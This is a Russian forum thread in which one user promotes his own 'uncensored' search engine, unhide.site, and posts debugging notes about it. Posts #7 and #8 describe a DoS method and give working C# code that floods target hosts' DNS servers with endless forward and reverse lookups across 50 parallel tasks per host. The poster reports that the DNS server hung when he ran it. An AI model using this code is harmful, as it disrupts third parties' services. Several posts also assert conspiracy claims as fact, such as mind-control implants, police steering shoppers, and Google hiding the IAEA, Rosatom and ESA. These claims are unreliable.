pcixi.ru
Творческое объединение шизофреников
Лечение шизофрении творчеством и общением на pcixi.ru

  • Страница 1 из 2
  • 1
  • 2
  • »
Форум » Душевное общение » Увлечения » Компьютер и компьютерные игры » Поиск unhide.site - снимите очки Google (Без отслеживания и цензуры)
Поиск unhide.site - снимите очки Google
Talomir #1 | Понедельник, 04.04.2022, 09:53
Автор темы
Повелитель буйных
Поступившие в отделение
Юзер-бар +
Современный мир насквозь пронизан системами отслеживания, как пасмурный день - лучами пробивающегося солнца. Я привёл это сравнение не как комплимент технологиям слежения, а как аналогию, показывающую плотность слежки в общем проценте бытового поведения людей. Видеокамеры в городе, видеорегистраторы в машинах, системы наблюдения в магазинах, отслеживание и позиционирование в смартфонах и телефонах, скрытая прослушка в телефонах и квартирах (так называемые закладные устройства, жучки), троянские программы в компьютере и телефоне, и, даже, биологические чипы и имплантанты с радио-протоколами CDMA, VHF, UHF.

Всё это делается якобы для борьбы с преступностью, но элементарно позволяет злоупотреблять технологиями слежения. Людям, их знающим, и имеющим к ним доступ. Я не затрагиваю подробно тему слежки, пыток и убийств на расстоянии или управляемых имплантантами заболеваний в этой статье, а привожу лишь самое распространённое злоупотребление технологиями слежения и управления в быту: банальнейшее кукловодство.

Например, сотрудники полиции, хорошо знающие слежку и отслеживание, устраиваются работать в отделы безопасности супермаркетов и крупных торговых центров и начинают активно участвовать в продажах магазина. Их цель - прибыль, и используют они только навыки, которыми владеют, то есть слежка, допросы, давление на психику.
Вы написали на форуме, что переделываете телефон - в супермаркете, в отделе дополнительных товаров, через день уже лежит набор отвёрток под сотовый телефон. Вы решили купить новое компьютерное кресло - в супермаркете оно волшебно появляется на следующий день, хоть вы об этом никому не говорили. Вы поздоровались с охранницей супермаркета - она, шутя, приводит половину фактов вашей биографии и жизни, случайно проговариваясь. Откуда охране супермаркета известна вся ваша личная и сетевая жизнь? Вы когда-нибудт задумывались над этим?

Оттуда-же, откуда и полиции, из непрерывного отслеживания ваших действий, в интернете, в доме и квартире, в городе и за городом. В интернете отслеживаются все ваши псевдонимы, посты на форумах и блогах, в мессенджере и на сайте, в электронной почте и в текстовых файлах на компьютере, разрабатываемые программы и совершаемые покупки. И, даже, отслеживаются все посещаемые вами сайты.

Слежение непрерывно ведётся за почти каждым пользователем интернета, и для этого, кроме кустарных методов снятия отпечатков браузера, и инфицирования компьютера вирусом, в сетевые протоколы вносятся поправки, позволяющие отслеживание и переходы между сайтами, типа файлов куки. С этим надо что-то делать, иначе вы купите в супермаркете дорогой музыкальный синтезатор и не будете знать что с ним делать, а главное - зачем вы его купили, как это было со мной! И так будет каждый месяц, как только вы будете получать деньги.

Весь этот феномен управляемых покупок называется кукловодством, в котором человек является резиновой куклой, которой можно управлять и навязывать ей поведение, используя технологиии наблюдения и био-электрического управления, на современном модном жаргоне называющиеся кибернетикой. Именно против кукловодов, как типа, в первую очередь борется проект Unhide, и интернет-поиск без отслеживания является важным болтом в общем механизме сокрвытия личной активности и работы в Этот поиск не записывает поисковые запросы пользователя в файл протокола и не хранит их, не сохраняет IP адрес отправителя запроса, не сохраняяет на компьютере пользователя файлы куки, не сопоставляет компьютер пользователя с его псевдонимом, фамилией или ID, не передаёт на сайты Referer при переходе из поиска, не подтасовывает поисковую выдачу под собранную информацию о пользователе, и вообще, не собирает никакой информации о пользователе. Его идея монетизации основана не на отслеживании интересов и намерений пользователей и впаривании им товаров под интерес, а на продаже своей локальной копии поиска, для компьютера пользователя, чтобы он мог просматривать интернет без отслеживания и цензуры. Этот локальный поиск на компьютере сам сканирует интернет, и поисковые запросы не передаются по сети вообще, это самый рекомендуемый режим использования поиска Unhide. Именно по этому его вторым названием есть 'Personal Internet Search' - поиск с локального компьютера, а не с сервера.

Второй проблемой, решаемой интернет поиском Unhide, является цензура. Пропуская весь сетевой трафик интернета через свой сервер, компания google может делать с планетарной сетью всё, что угодно: скрывать сайты конкурентов и неугодных политическим группам у текущей власти, накручивать популярность выбранных сайтов и партнёров, подстраивать поисковую выдачу для целей модификации поведения или психологического влияния на человека в информационных операциях и пропаганде, влиять на экономику страны, например с целью разорения, поднимать и обваливать акции компаний, при помощи выдачи позитивной или негативной для акции информации, и, главное, такой централизованный поиск чрезвычайно не надёжен: достаточно программного или аппаратного сбоя или одной ракеты-снаряда чтобы лишить всю страну и планету интернета! Если поиск анхайд будет установлен у каждого дома, то поисковая система станет децентрализованной и исчезнет единственная точка сбоя - центральный узел, такую поисковую сеть поразить намного сложнее, нужен уже миллиард ракет, вместо одной, такая децентрализованная система становится более устойчивой.

Поиск без цензуры unhide.site предоставляет найденные в интернете и добавленные пользователями сайты как есть, без сознательной манипуляции, без просмотра цензором, не запрещая эротику, взломанные программы, фильмы, книги и музыку. Он не отфильтровывает провокационные журналистские материалы, блоги, форумы, сайты, и использует принцип голой правды о мире вместо басен сказочников. Единственное, что поиск пытается убирать из своей базы данных, так это шарлатанов, кукловодов и информацию полицейского террора.

Внутри себя программа поиска основывается на группах параллельных потоков, пробующих порты 80 и 443 на предмет веб-сайтов по всему интернету, встроенном микро-http сервере для обслуживания поисковых HTTP запросов пользователей, чрезвычайно-экономном файле с хэшами ключевых слов страничек, позволяющем захэшировать весь интернет с домашнего ноутбука, и нескольких служебных txt файлов. Поиск работает стабильно на домашнем ноутбуке с Windows, эта версия стои всего $15, и более-менее нормально на Linux сервере VPS, этот поиск



Ламеры ламают, хакеры - поламывают. Ламеры хромают, хакеры - прихрамывают.
Моя лучшая хакерская тема: https://pcixi.ru/forum/78-11690-1
Моя последняя крутая тема: https://pcixi.ru/forum/78-11690-1
Статус: нет меня
 
Talomir #2 | Вторник, 05.04.2022, 15:09
Автор темы
Повелитель буйных
Поступившие в отделение
Юзер-бар +
АНОНИМНЫЙ САЙТ В UNHIDE.SITE

Последние аресты за публикации в интернете могут распространиться с мессенджеров и социальных сетей на сайты. Как сделать сайт анонимно и доступным для прочтения?

Для этого надо решить проблему с анонимным хостингом, первое, и анонимным добавлением сайта в поиск, второе. О последнем я и хочу рассказать.

Дело в том, что для добавления сайта в google вначале для этой компании надо подтвердить право собственности на сайт, разместив на нём секретную строку, выданную google. Для этого надо вначале зарегистрировать аккаунт гугл, с фамилией, именем и отчеством и номером телефона. А после этого подтвердить номер телефона кодом на SMS. По номеру телефона, запросом в банковскую базу данных и в базу данных телефонной компании, полиция получает реальные ФИО владельца сайта!

То есть, абсолютно все сайты в google привязаны к настоящим именам и фамилиям их создателей, отсюда и аресты и сроки. Этого нет, который я запустил сдля обхода цензуры. Сайт может добавить любой пользователь, как свой сайт, так и любой посторонний сайт, ничего подтверждать не надо. Добро пожаловать в поиск unhide.site, заходите, добавляйте сайты.




Ламеры ламают, хакеры - поламывают. Ламеры хромают, хакеры - прихрамывают.
Моя лучшая хакерская тема: https://pcixi.ru/forum/78-11690-1
Моя последняя крутая тема: https://pcixi.ru/forum/78-11690-1
Сообщение отредактировал(а) Talomir - Вторник, 05.04.2022, 15:10
Статус: нет меня
 
Talomir #3 | Вторник, 05.04.2022, 16:37
Автор темы
Повелитель буйных
Поступившие в отделение
Юзер-бар +



Ламеры ламают, хакеры - поламывают. Ламеры хромают, хакеры - прихрамывают.
Моя лучшая хакерская тема: https://pcixi.ru/forum/78-11690-1
Моя последняя крутая тема: https://pcixi.ru/forum/78-11690-1
Статус: нет меня
 
Talomir #4 | Вторник, 05.04.2022, 22:00
Автор темы
Повелитель буйных
Поступившие в отделение
Юзер-бар +
Сегодня пофиксал баг с зависанием поиска - не хватало 2 Гб памяти, выделил 3Гб. программа уходила в своп или снималась с выполнения. Ошибку искал 5 дней, правил и пробовал всё, сегодня вроде получилось.


Ламеры ламают, хакеры - поламывают. Ламеры хромают, хакеры - прихрамывают.
Моя лучшая хакерская тема: https://pcixi.ru/forum/78-11690-1
Моя последняя крутая тема: https://pcixi.ru/forum/78-11690-1
Статус: нет меня
 
Talomir #5 | Среда, 06.04.2022, 15:27
Автор темы
Повелитель буйных
Поступившие в отделение
Юзер-бар +
ИНТЕРНЕТ ПОИСК В ТАТРАХ - ГОРЫ

Я сижу в особняке в Словакии, во дворе дома на склоне горы, среди сосен, на фоне лыжной трассы за террасой. Никого, птицы, олени, медведь, три собаки с котом и большая семья.

Пью двухлитровый пепси за 0.89 евро и курю красный winston за 4.6 евро/пачка. На деревянном столе, перед кострищем, передо мной стоит широкоформатный ноутбук Lenovo, с этим форумом и моим поиском Unhide в закреплённой вкладке, я занимаюсь администрированием и доводкой своей поисковой системы PIS.

Словакия оплатила год проживания семье, из-за военных действий в Украине, и штаб-квартира Технологий Боттинга 12 год будет находится в горах - в малых Татрах, Словакия, это горы типа Карпат, только круче, горнолыжный курорт, на лыжной трассе до сих пор лежит снег.

У нужного не может быть не нужных последствий, и именно так исполняются мои мечты и желания - я мечтал о домике в горах, вначале в Крымских, но из-за войны получился в Словацких татрах. Медитативный транс, крепкий дым сигарет, смешанный с лимонадом и ноотропным эффектом, работа за компьютером, здоровье и сон. Добро пожаловать в мой поиск без цензуры и отслеживания !




Ламеры ламают, хакеры - поламывают. Ламеры хромают, хакеры - прихрамывают.
Моя лучшая хакерская тема: https://pcixi.ru/forum/78-11690-1
Моя последняя крутая тема: https://pcixi.ru/forum/78-11690-1
Статус: нет меня
 
Talomir #6 | Среда, 06.04.2022, 18:05
Автор темы
Повелитель буйных
Поступившие в отделение
Юзер-бар +
НАСТРОЙКИ DNS САЙТА ДЛЯ БЮДЖЕТА $2/ГОД ЗА ДОМЕН

Регистратор namecheap.com, домен верхнего уровня (Top Level Domain).site

Я неделю искал баг в коде, приводящий к зависанию поиска в браузере, оказалось, как показал Brave Browser, проблема в DNS, который я купил за $2 на год. Браузеры Edge и Brave, собранные на одном и том же движке, ошибочно кэшируют Dynamic DNS - новую поправку к протоколу Domain Name System.

Для нормальной работы домена рекомендуется выключить DynDNS и DNS Sec, а записи A + DynDNS заменить на A Record. Как на следующем рисунке:




Ламеры ламают, хакеры - поламывают. Ламеры хромают, хакеры - прихрамывают.
Моя лучшая хакерская тема: https://pcixi.ru/forum/78-11690-1
Моя последняя крутая тема: https://pcixi.ru/forum/78-11690-1
Статус: нет меня
 
Talomir #7 | Четверг, 07.04.2022, 09:39
Автор темы
Повелитель буйных
Поступившие в отделение
Юзер-бар +
УЯЗВИМОСТИ DNS СЕРВЕРОВ ПРИВОДЯЩИЕ К DoS

В процессе портирования и наладки персонального интернет поиска с Windows на Linux наткнулся на вторую проблему DNS, слишком частые запросы к DNS серверу домена приводят к зависанию DNS сервера и недоступности сайта в браузерах.

У меня было 50 потоков, делающих обратные DNS запросы, для преобразования IP в domain name при сканировании веб-сайтов в поиске. В итоге, сайт не резолвился в трети случаев и не открывался в браузере. Я добавил задержку между запросами 100 миллисекунд и сделал 10 потоков вместо 50.

Для эксплуатации уязвимости достаточно слать в вечном цикле прямые и обратные DNS запросы по IP/DNS сайта - они будут перенаправлены на сервер, ответственный за домен, и скорее всего перегрузят и затормозят сервер, сайт перестанет открываться в браузерах, ситуация DoS.



Ламеры ламают, хакеры - поламывают. Ламеры хромают, хакеры - прихрамывают.
Моя лучшая хакерская тема: https://pcixi.ru/forum/78-11690-1
Моя последняя крутая тема: https://pcixi.ru/forum/78-11690-1
Статус: нет меня
 
Talomir #8 | Четверг, 07.04.2022, 10:26
Автор темы
Повелитель буйных
Поступившие в отделение
Юзер-бар +
Простая программа на C# для тестирования на уязвимость (консольное приложение, файл Program.cs).

Запуск под Windows: C:\>nm host1 host2 host3 host4...

Запуск под Linux: mono nm.exe host1 host2 host3 host4...

Код
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Net;

namespace nm
{
    class Program
    {
        static void Main(string[] args)
        {
            foreach (string host in args) for (int i = 0; i < 50; i++) Task.Run(() => Test(host));
            while (true) Console.ReadLine();
        }

        static async Task Test(string host)
        {
            while (true)
            {
                IPAddress ip = null;

                try { ip = Dns.GetHostAddresses(host)[0]; } catch { }
                if (ip != null) try { Dns.GetHostByAddress(ip); } catch { }
            }
        }
    }
}



Ламеры ламают, хакеры - поламывают. Ламеры хромают, хакеры - прихрамывают.
Моя лучшая хакерская тема: https://pcixi.ru/forum/78-11690-1
Моя последняя крутая тема: https://pcixi.ru/forum/78-11690-1
Статус: нет меня
 
Talomir #9 | Четверг, 07.04.2022, 15:01
Автор темы
Повелитель буйных
Поступившие в отделение
Юзер-бар +
ВРОДЕ РЕШИЛ ПРОБЛЕМЫ

Вижу, что практически вылечил сервер поиска, ушла ровно неделя. С десяток поправок кода и поправки конфигурации VPS и DNS для обхода багов браузеров: проблемы кода были и у меня и в браузерах. Сегодня пол дня поиск работал без зависаний, кроме момента тестирования на уязвимость домена - тогда DNS сервер новых дешёвых доменов повис, и поиск 5 минут или более долго открывался в браузере.




Ламеры ламают, хакеры - поламывают. Ламеры хромают, хакеры - прихрамывают.
Моя лучшая хакерская тема: https://pcixi.ru/forum/78-11690-1
Моя последняя крутая тема: https://pcixi.ru/forum/78-11690-1
Сообщение отредактировал(а) Talomir - Четверг, 07.04.2022, 15:03
Статус: нет меня
 
Talomir #10 | Четверг, 07.04.2022, 15:07
Автор темы
Повелитель буйных
Поступившие в отделение
Юзер-бар +
добро пожаловать в мой поиск без цензуры...




Ламеры ламают, хакеры - поламывают. Ламеры хромают, хакеры - прихрамывают.
Моя лучшая хакерская тема: https://pcixi.ru/forum/78-11690-1
Моя последняя крутая тема: https://pcixi.ru/forum/78-11690-1
Статус: нет меня
 
Talomir #11 | Пятница, 08.04.2022, 11:42
Автор темы
Повелитель буйных
Поступившие в отделение
Юзер-бар +
ПОИСК UNHIDE.SITE ТЕПЕРЬ НА РУССКОМ И АНГЛИЙСКОМ ЯЗЫКАХ

Я поставил русский дополнительным языком в поиске он поддерживает два языка: английский, основной, и второй язык, дополнительный, локальный. Вначале дополнительным стоял словацкий.

Причина - администратору нечего читать в поиске, я русскоговорящий, хоть средне знаю ещё английский и украинский, но родной язык - русский, и я привык читать на нём. Как и половина Украины. В Словакии часть населения тоже знает русский, они изучали его в школах, в 80-е 90-е.

Так что теперь я сажусь за добавление основных русских форумов, что уцелели после конфликта, и основных русских сайтов - по моим интересам. Если у вас есть желание добавить сайты - велком на анхаййд, никаких дополнительных разрешений не надо!

Продолжаю борьбу с багами, аптайм сайта уже значительно вырос, после недели непрерывных тестирования и поправок, но, возможно, пофиксано ещё не всё. Я писал, что первый месяц поиск будет работать в тестовом режиме, доводки и наладки!




Ламеры ламают, хакеры - поламывают. Ламеры хромают, хакеры - прихрамывают.
Моя лучшая хакерская тема: https://pcixi.ru/forum/78-11690-1
Моя последняя крутая тема: https://pcixi.ru/forum/78-11690-1
Статус: нет меня
 
Talomir #12 | Пятница, 08.04.2022, 14:37
Автор темы
Повелитель буйных
Поступившие в отделение
Юзер-бар +
РАСКРЫТЫ 3 СЕРЪЁЗНЫХ ОРГАНИЗАЦИИ УПРЯТЫВАЕМЫЕ GOOGLE

На сегодня поиск unhide.site раскрыл 3 серъёзных организации, упрятываемые google от меня в течении 20 лет!

- Агенство МАГАТЭ (регулирование ядерной промышленности и радиационная безопасность РБ)

- Корпорация РосАтом (строительство ядерных объектов, крупнейший игрок)

- ESA European Space Agency (Европейское Космическое Агенство)



Ламеры ламают, хакеры - поламывают. Ламеры хромают, хакеры - прихрамывают.
Моя лучшая хакерская тема: https://pcixi.ru/forum/78-11690-1
Моя последняя крутая тема: https://pcixi.ru/forum/78-11690-1
Статус: нет меня
 
Talomir #13 | Пятница, 08.04.2022, 17:24
Автор темы
Повелитель буйных
Поступившие в отделение
Юзер-бар +
ПОИСК теперь летает, по скорости! Я не ожидаю от браузера ничего, кроме первого пакета данных, из-за чего сессия связи получается короткой и быстрой. Поиск стал мгновенно открываться и мгновенно выдавать результаты, а до этого в каждом пятом-восьмом случае происходило зависание на 5 минут из-за ожидания пакетов, которые не приходили.

[b]Поправка
стала возможной благодаря команде линукса tcpdump -vv tcp and port 80, которая показала трафик от FireFox в момент повиса форума. Так я вычислил основнейшую проблему...



Ламеры ламают, хакеры - поламывают. Ламеры хромают, хакеры - прихрамывают.
Моя лучшая хакерская тема: https://pcixi.ru/forum/78-11690-1
Моя последняя крутая тема: https://pcixi.ru/forum/78-11690-1
Статус: нет меня
 
Talomir #14 | Пятница, 08.04.2022, 20:55
Автор темы
Повелитель буйных
Поступившие в отделение
Юзер-бар +



Ламеры ламают, хакеры - поламывают. Ламеры хромают, хакеры - прихрамывают.
Моя лучшая хакерская тема: https://pcixi.ru/forum/78-11690-1
Моя последняя крутая тема: https://pcixi.ru/forum/78-11690-1
Статус: нет меня
 
Talomir #15 | Пятница, 08.04.2022, 21:18
Автор темы
Повелитель буйных
Поступившие в отделение
Юзер-бар +



Ламеры ламают, хакеры - поламывают. Ламеры хромают, хакеры - прихрамывают.
Моя лучшая хакерская тема: https://pcixi.ru/forum/78-11690-1
Моя последняя крутая тема: https://pcixi.ru/forum/78-11690-1
Статус: нет меня
 
Форум » Душевное общение » Увлечения » Компьютер и компьютерные игры » Поиск unhide.site - снимите очки Google (Без отслеживания и цензуры)
  • Страница 1 из 2
  • 1
  • 2
  • »
Поиск:

[ Новые сообщения на форуме ]



Форма входа
Логин:
Пароль: